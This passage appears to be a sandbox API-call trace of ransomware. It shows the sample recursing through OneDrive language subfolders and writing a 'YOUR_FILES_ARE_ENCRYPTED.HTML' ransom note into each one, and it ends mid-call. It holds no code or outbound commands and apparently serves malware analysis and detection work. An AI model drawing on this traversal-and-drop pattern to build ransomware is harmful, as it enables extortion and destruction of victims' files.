[0161.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ja\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ja\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.820] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.822] CloseHandle (hObject=0x5b8) returned 1 [0161.823] GetProcessHeap () returned 0x270000 [0161.824] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.824] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa44aa4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4673550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4673550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ka", cAlternateFileName="")) returned 1 [0161.824] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka") returned 74 [0161.824] GetProcessHeap () returned 0x270000 [0161.824] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.824] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka" [0161.824] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka\\*" [0161.824] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa44aa4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4673550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4673550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.825] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa44aa4d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4673550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4673550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.825] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4673550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4673550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4673550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x134b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.825] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.825] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.825] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.825] lstrlenW (lpString=".mui") returned 4 [0161.825] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.825] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4673550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4673550, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4673550, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x134b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.825] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.825] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ka\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ka\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.826] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.828] CloseHandle (hObject=0x5b8) returned 1 [0161.829] GetProcessHeap () returned 0x270000 [0161.830] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.830] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4673550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa49b9390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa49b9390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="kk", cAlternateFileName="")) returned 1 [0161.830] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk") returned 74 [0161.830] GetProcessHeap () returned 0x270000 [0161.830] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.830] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk" [0161.830] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk\\*" [0161.830] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4673550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa49b9390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa49b9390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.831] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4673550, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa49b9390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa49b9390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.831] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa49b9390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa49b9390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa49b9390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.831] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.831] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.831] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.831] lstrlenW (lpString=".mui") returned 4 [0161.831] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.831] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa49b9390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa49b9390, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa49b9390, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.831] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.831] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\kk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.832] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.834] CloseHandle (hObject=0x5b8) returned 1 [0161.835] GetProcessHeap () returned 0x270000 [0161.836] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.836] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa49b9390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4ba8570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4ba8570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="km-kh", cAlternateFileName="")) returned 1 [0161.836] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh") returned 77 [0161.836] GetProcessHeap () returned 0x270000 [0161.836] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.836] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh" [0161.836] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh\\*" [0161.836] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa49b9390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4ba8570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4ba8570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.837] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa49b9390, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4ba8570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4ba8570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.837] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4ba8570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4ba8570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4ba8570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.837] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.837] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.837] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.837] lstrlenW (lpString=".mui") returned 4 [0161.837] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.837] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4ba8570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4ba8570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4ba8570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.838] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.838] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.838] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\km-kh\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\km-kh\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.838] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.841] CloseHandle (hObject=0x5b8) returned 1 [0161.841] GetProcessHeap () returned 0x270000 [0161.842] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.842] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4ba8570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4e09b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4e09b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="kn", cAlternateFileName="")) returned 1 [0161.842] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn") returned 74 [0161.842] GetProcessHeap () returned 0x270000 [0161.842] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.842] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn" [0161.842] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn\\*" [0161.842] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4ba8570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4e09b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4e09b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.843] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4ba8570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4e09b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4e09b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.843] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4e09b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4e09b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4e09b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.843] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.843] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.843] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.843] lstrlenW (lpString=".mui") returned 4 [0161.843] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.843] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa4e09b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4e09b70, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4e09b70, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x13ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.843] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.843] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.843] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\kn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\kn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.844] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.846] CloseHandle (hObject=0x5b8) returned 1 [0161.847] GetProcessHeap () returned 0x270000 [0161.847] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.847] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4e09b70, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa4f86930, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa4f86930, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ko", cAlternateFileName="")) returned 1 [0161.847] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko") returned 74 [0161.847] GetProcessHeap () returned 0x270000 [0161.847] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.847] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ko" | out: 